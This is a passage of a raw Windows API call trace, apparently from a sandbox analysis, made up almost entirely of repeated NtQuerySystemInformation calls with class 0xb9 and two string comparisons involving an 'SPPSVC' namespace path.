ResultLength=0x0) [0287.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0287.542] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0287.556] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation 